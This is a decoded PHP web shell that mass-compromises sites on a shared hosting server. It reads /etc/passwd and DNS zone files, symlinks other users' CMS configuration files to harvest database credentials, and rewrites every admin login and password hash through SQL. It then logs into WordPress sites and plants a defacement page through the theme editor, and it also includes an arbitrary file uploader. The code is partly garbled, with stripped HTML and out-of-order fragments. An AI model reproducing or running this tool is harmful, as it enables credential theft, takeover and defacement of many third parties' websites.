/* Decoded by unphp.net */ ?>
'.$domain.''.$owner['name'].'/WordPress'.Chr(10); file_put_contents("temp.txt",$str,FILE_APPEND); } } } } $etc = file_get_contents("/etc/passwd"); $etcz = explode(" ",$etc); foreach($etcz as $etz){ $etcc = explode(":",$etz); error_reporting(0); $current_dir = posix_getcwd(); $dir = explode("/",$current_dir); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp-config.php','pee/'.$etcc[0].'-WordPress.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/blog/wp-config.php','pee/'.$etcc[0].'-WordPress.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp/wp-config.php','pee/'.$etcc[0].'-WordPress.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/wp-config.php','pee/'.$etcc[0].'-WordPress.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/config.php','pee/'.$etcc[0].'-PhpBB.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/config.php','pee/'.$etcc[0].'-vBulletin.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/configuration.php','pee/'.$etcc[0].'-Joomla.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/web/configuration.php','pee/'.$etcc[0].'-Joomla.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/joomla/configuration.php','pee/'.$etcc[0].'-Joomla.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/configuration.php','pee/'.$etcc[0].'-Joomla.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/conf_global.php','pee/'.$etcc[0].'-IPB.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/inc/config.php','pee/'.$etcc[0].'-MyBB.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/Settings.php','pee/'.$etcc[0].'-SMF.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/sites/default/settings.php','pee/'.$etcc[0].'-Drupal.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/e107_config.php','pee/'.$etcc[0].'-e107.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/datas/config.php','pee/'.$etcc[0].'-Seditio.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/configure.php','pee/'.$etcc[0].'-osCommerce.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/client/configuration.php','pee/'.$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientes/configuration.php','pee/'.$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/support/configuration.php','pee/'.$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/supportes/configuration.php','pee/'.$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmcs/configuration.php','pee/'.$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domain/configuration.php','pee/'.$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/hosting/configuration.php','pee/'.$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmc/configuration.php','pee/'.$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/billing/configuration.php','pee/'.$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/configuration.php','pee/'.$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/order/configuration.php','pee/'.$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientarea/configuration.php','pee/'.$etcc[0].'-WHMCS.txt'); symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domains/configuration.php','pee/'.$etcc[0].'-WHMCS.txt'); if(chk_header($link)) { $str = ''.$etcc[0].'/WordPress'.Chr(10); file_put_contents("temp.txt",$str,FILE_APPEND); } } function chk_header($link){ $pee = get_headers($link,1); if(strpos($pee[0],"200")){ return true; }else{ return false; } } function Find($str,$start,$end){ $len = strlen($str); $start_pos = (strpos($str,$start) + strlen($start)); $str = substr($str,$start_pos); $end_pos = strpos($str,$end); $str = substr($str,0,$end_pos); return $str; } $pageURL = 'http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]; $u = explode("/",$pageURL ); $pageURL =str_replace($u[count($u)-1],"",$pageURL ); ####### function cms_add($link,$domain,$owner,$cms) { $link = $link.'-'.$cms.'.txt'; if(chk_header($link)) { $url = 'http://'.$domain; $str = ' '.$domain.''.$owner.''.$cms.''.Chr(10); file_put_contents("pee.tmp",$str,FILE_APPEND); echo $str; } } function CurlPage($url,$post = null,$head = true) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, $head); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']); curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt"); curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt"); If ($post != NULL){ curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); } $urlPage = curl_exec($ch); if(curl_errno($ch)){ echo curl_error($ch); } curl_close($ch); return($urlPage); } function listall($file,$str){ if(file_exists($file)){ $do = file_get_contents($file); if(!strpos($do,$str)){ file_put_contents($file,$str,FILE_APPEND); } }else{ file_put_contents($file,$str,FILE_APPEND); } } echo " [ ./CmsDetector~ ] -- [ ./MassPASSChange~ ] -- [ ./Wp Mass Defacer~ ] -- [ ./Uploader~ ]

"; if(isset($_REQUEST['do'])){ switch ($_REQUEST['do']){ ################CMS DETECTOR case 'cms_detect': if(!file_exists('pee.tmp')){ @fopen('pee.tmp', 'w'); echo''; echo''; $p = 0; if(is_readable("/var/named")){ $list = scandir("/var/named"); $current_dir = posix_getcwd(); $dir = explode("/",$current_dir); foreach($list as $domain){ if(strpos($domain,".db")) { $domain = str_replace('.db','',$domain); $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain)); error_reporting(0); $link = $pageURL.'pee/'.$owner['name']; cms_add($link,$domain,$owner['name'],"WordPress"); cms_add($link,$domain,$owner['name'],"Joomla"); cms_add($link,$domain,$owner['name'],"vBulletin"); cms_add($link,$domain,$owner['name'],"WHMCS"); cms_add($link,$domain,$owner['name'],"PhpBB"); cms_add($link,$domain,$owner['name'],"MyBB"); cms_add($link,$domain,$owner['name'],"IPB"); cms_add($link,$domain,$owner['name'],"SMF"); cms_add($link,$domain,$owner['name'],"Drupal"); cms_add($link,$domain,$owner['name'],"e107"); cms_add($link,$domain,$owner['name'],"Seditio"); cms_add($link,$domain,$owner['name'],"osCommerce"); } } } }else{ echo'

SITE

USER

CMS

'; echo''; $content = file_get_contents($pageURL.'pee.tmp'); echo $content; } break; ################MASS DEFACE case 'pass_change': echo << USER :
PASS :

PEE; if($_POST){ ################### USER & PASS ################ $user = $_POST['user']; $pass = $_POST['pass']; ################################################ if(is_readable("/var/named")) { echo'

SITE

USER

CMS

'; echo ''; $list = scandir("/var/named"); foreach($list as $domain){ if(strpos($domain,".db")) { $domain = str_replace('.db','',$domain); $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain)); $url = 'http://'.$domain; if(chk_header($pageURL.'pee/'.$owner['name'].'-WordPress.txt')) { $config = $pageURL.'pee/'.$owner['name'].'-WordPress.txt'; file_get_contents($pageURL.'pee/'.$owner['name'].'-WordPress.txt'); ##GET DATABASE INFO FROM CONFIGURATION FILE $cnf = file_get_contents($pageURL.'pee/'.$owner['name'].'-WordPress.txt'); $hostname = Find($cnf,"define('DB_HOST', '","');"); $username = Find($cnf,"define('DB_USER', '","');"); $password = Find($cnf,"define('DB_PASSWORD', '","');"); $dbname = Find($cnf,"define('DB_NAME', '","');"); $prefix = Find($cnf,"table_prefix = '","'"); $link=mysql_connect($hostname,$username,$password); if ($link) { $hash = crypt($pass); mysql_select_db($dbname,$link) ; $tab = $prefix.'users'; $query2 = @mysql_query("UPDATE `$tab` SET `user_login` ='$user'"); $query3 = @mysql_query("UPDATE `$tab` SET `user_pass` ='$hash'"); $req =@mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'"); $data = mysql_fetch_array($req); $site_url=$data["option_value"]; error_reporting(0); echo ''; }else{ echo ''; } } elseif(chk_header($pageURL.'pee/'.$owner['name'].'-Joomla.txt')) { ##GET DATABASE INFO FROM CONFIGURATION FILE $cnf = file_get_contents($pageURL.'pee/'.$owner['name'].'-Joomla.txt'); $config = $pageURL.'pee/'.$owner['name'].'-Joomla.txt'; if(preg_match('%(JConfig|mosConfig)%',$cnf)){ ###### if(preg_match('%JConfig%', $cnf)){ $username=Find($cnf,"\$user = '","'"); $password=Find($cnf,"\$password = '","'"); $dbname=Find($cnf,"\$db = '","'"); $prefix=Find($cnf,"\$dbprefix = '","'"); $link=mysql_connect("localhost",$username,$password); if ($link) { $hash = md5($user); mysql_select_db($dbname,$link) ; $tab = $prefix.'users'; $query2 = @mysql_query("UPDATE `$tab` SET `username` ='$user'"); $query3 = @mysql_query("UPDATE `$tab` SET `password` ='$hash'"); echo ''; } } ##### elseif(preg_match('%mosConfig%',$cnf)){ $username=Find($cnf,"\$mosConfig_user = '","'"); $password=Find($cnf,"\$mosConfig_password = '","'"); $dbname=Find($cnf,"\$mosConfig_db = '","'"); $prefix=Find($cnf,"\$mosConfig_dbprefix = '","'"); $pwd = md5($npass); $link=mysql_connect("localhost",$username,$password); if ($link) { $hash = md5($pass); mysql_select_db($dbname,$link) ; $tab = $prefix.'users'; $query2 = @mysql_query("UPDATE `$tab` SET `username` ='$user'"); $query3 = @mysql_query("UPDATE `$tab` SET `password` ='$hash'"); echo ''; } } } ######### } } } } elseif(is_readable("/etc/passwd")){ echo'

DOMAIN	USER	CMS	STATUS
'.$domain.'	'.$owner['name'].'	WordPress	success..
'.$domain.'	'.$owner['name'].'	WordPress	mysql fail
'.$domain.'	'.$owner['name'].'	Joomla	success.. '; }else{ echo '
'.$domain.'	'.$owner['name'].'	Joomla	mysql fail
'.$domain.'	'.$owner['name'].'	Joomla	success.. '; }else{ echo '
'.$domain.'	'.$owner['name'].'	Joomla	mysql fail

'; echo ''; foreach($etcz as $etz){ $etcc = explode(":",$etz); if(chk_header($pageURL.'pee/'.$etcc[0].'-WordPress.txt')) { $config = $pageURL.'pee/'.$owner['name'].'-WordPress.txt'; file_get_contents($pageURL.'pee/'.$etcc[0].'-WordPress.txt'); ##GET DATABASE INFO FROM CONFIGURATION FILE $cnf = file_get_contents($pageURL.'pee/'.$etcc[0].'-WordPress.txt'); $hostname = Find($cnf,"define('DB_HOST', '","');"); $username = Find($cnf,"define('DB_USER', '","');"); $password = Find($cnf,"define('DB_PASSWORD', '","');"); $dbname = Find($cnf,"define('DB_NAME', '","');"); $prefix = Find($cnf,"table_prefix = '","'"); $link=mysql_connect($hostname,$username,$password); if ($link) { $hash = crypt($user); mysql_select_db($dbname,$link) ; $req =mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'"); $data = mysql_fetch_array($req); $site_url=$data["option_value"]; $tab = $prefix.'users'; $query2 = @mysql_query("UPDATE `$tab` SET `user_login` ='$user'"); $query3 = @mysql_query("UPDATE `$tab` SET `user_pass` ='$hash'"); error_reporting(0); echo ''; } } elseif(chk_header($pageURL.'pee/'.$etcc[0].'-Joomla.txt')) { ##GET DATABASE INFO FROM CONFIGURATION FILE $cnf = file_get_contents($pageURL.'pee/'.$etcc[0].'-Joomla.txt'); $config = $pageURL.'pee/'.$owner['name'].'-Joomla.txt'; if(preg_match('%(JConfig|mosConfig)%',$cnf)){ ###### if(preg_match('%JConfig%', $cnf)){ $username=Find($cnf,"\$user = '","'"); $password=Find($cnf,"\$password = '","'"); $dbname=Find($cnf,"\$db = '","'"); $prefix=Find($cnf,"\$dbprefix = '","'"); $site_url = Find($cnf,"\$mailfrom = '","'"); $site_url = explode("@",$site_url); $link=mysql_connect("localhost",$username,$password); if ($link) { $hash = md5($pass); mysql_select_db($dbname,$link) ; $tab = $prefix.'users'; $query2 = @mysql_query("UPDATE `$tab` SET `username` ='$user'"); $query3 = @mysql_query("UPDATE `$tab` SET `password` ='$hash'"); echo ''; } } ##### elseif(preg_match('%mosConfig%',$cnf)){ $username=Find($cnf,"\$mosConfig_user = '","'"); $password=Find($cnf,"\$mosConfig_password = '","'"); $dbname=Find($cnf,"\$mosConfig_db = '","'"); $prefix=Find($cnf,"\$mosConfig_dbprefix = '","'"); $site_url = Find($cnf,"\$mailfrom = '","'"); $site_url = explode("@",$site_url); $link=mysql_connect("localhost",$username,$password); if ($link) { $hash = md5($pass); mysql_select_db($dbname,$link) ; $tab = $prefix.'users'; $query2 = @mysql_query("UPDATE `$tab` SET `username` ='$user'"); $query3 = @mysql_query("UPDATE `$tab` SET `password` ='$hash'"); echo ''; } } } ######### } } } } break; ################MASS DEFACE case 'wp_def': ################### USER & PASS ################ $user = 'admin'; $pass = 'foo'; ################################################ echo << Index Url:
PEE; if($_POST){ $deface = file_get_contents(trim($_POST['deface_page'])); if(is_readable("/var/named")) { echo'

DOMAIN	USER	CMS	STATUS
'.$domain.'	'.$owner['name'].'	WordPress	success.. '; }else{ echo '
'.$domain.'	'.$owner['name'].'	WordPress	mysql fail
'.$domain.'	'.$owner['name'].'	Joomla	success.. '; }else{ echo '
'.$domain.'	'.$owner['name'].'	Joomla	mysql fail
'.$domain.'	'.$owner['name'].'	Joomla	success.. '; }else{ echo '
'.$domain.'	'.$owner['name'].'	Joomla	mysql fail

'; echo ''; $list = scandir("/var/named"); foreach($list as $domain){ if(strpos($domain,".db")) { $domain = str_replace('.db','',$domain); $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain)); $url = 'http://'.$domain; if(chk_header($pageURL.'pee/'.$owner['name'].'-WordPress.txt')) { $config = $pageURL.'pee/'.$owner['name'].'-WordPress.txt'; file_get_contents($pageURL.'pee/'.$owner['name'].'-WordPress.txt'); ##GET DATABASE INFO FROM CONFIGURATION FILE $cnf = file_get_contents($pageURL.'pee/'.$owner['name'].'-WordPress.txt'); $hostname = Find($cnf,"define('DB_HOST', '","');"); $username = Find($cnf,"define('DB_USER', '","');"); $password = Find($cnf,"define('DB_PASSWORD', '","');"); $dbname = Find($cnf,"define('DB_NAME', '","');"); $prefix = Find($cnf,"table_prefix = '","'"); $link=mysql_connect($hostname,$username,$password); if ($link) { $hash = crypt($pass); mysql_select_db($dbname,$link) ; $tab = $prefix.'users'; $query2 = @mysql_query("UPDATE `$tab` SET `user_login` ='$user'"); $query3 = @mysql_query("UPDATE `$tab` SET `user_pass` ='$hash'"); $req =@mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'"); $data = mysql_fetch_array($req); $site_url=$data["option_value"]; error_reporting(0); echo '"; } else { echo "error opening theme edtitor!"; } $nola = explode(Chr(10),$themeditor); foreach($nola as $nline){ if(preg_match('%theme-editor\.php\?file=%',$nline) && preg_match('%$(404\.php|archive\.php|comment\.php)$%',strtolower($nline))){ $modify[Find($nline,'(',')')] = Find($nline,''; if(is_array($modify)){ foreach($modify as $met=>$indfile){ $nri = str_replace('.','_',$met); $nri = "n".$nri; $indfile =str_replace("&","&",$indfile); $url = trim($site_url."/wp-admin/".$indfile); $themepage = CurlPage($url,""); $_wpnonce = Find($themepage,'name="_wpnonce" value="','"'); $_file = Find($themepage,'name="file" value="','"'); $nfile = explode('themes',$_file); $jfile = $site_url."/wp-content/themes".end($nfile); //Update file $url = $site_url."/wp-admin/theme-editor.php"; $postme = "newcontent=".$def."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File"; $themedied = CurlPage($url,$postme); if(preg_match('%

%',$themedied)){ $theme = Find($themeditor,'

404 Template'); if(preg_match("/twenty ten/i",$theme)){ $theme = "twentyten"; } elseif(preg_match("/twenty eleven/i",$theme)){$theme = "twentyeleven";} $theme = trim(str_replace("/","",$theme)); $d = $site_url.'/wp-content/themes/'.$theme.'/404.php'; listall("wp.txt",$d.Chr(10)); } } echo 'LINK
'; echo ''; }} ########################END DEFACE################# }else{ echo '

'; } }}}}} break; // Uploader case 'uploader': echo ''; echo ''; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '

Done !!
'; } else { echo 'Failed :(

DOMAIN	USER	CMS	STATUS	DEF URL
'.$domain.'	'.$owner['name'].'	WordPress	[#] User Pass Changed '; $post = 'log=admin&pwd=foo&rememberme=forever&wp-submit=Log In&testcookie=1'; $def=""; $buffer0 = CurlPage($site_url.'/wp-login.php',$post); if(!preg_match("/logout/i",$buffer0)) { echo "[X] FAILED TO LOGIN "; }else{ echo "[#] LOGGED IN :D "; $urlz = $site_url."/wp-admin/theme-editor.php"; $themeditor = CurlPage($urlz,$cookie,null); if(preg_match("/update file/i",$themeditor)){ echo "theme-editor opened
'.$domain.'	'.$owner['name'].'	WordPress	[x] mysql fail

'; } } }} ?>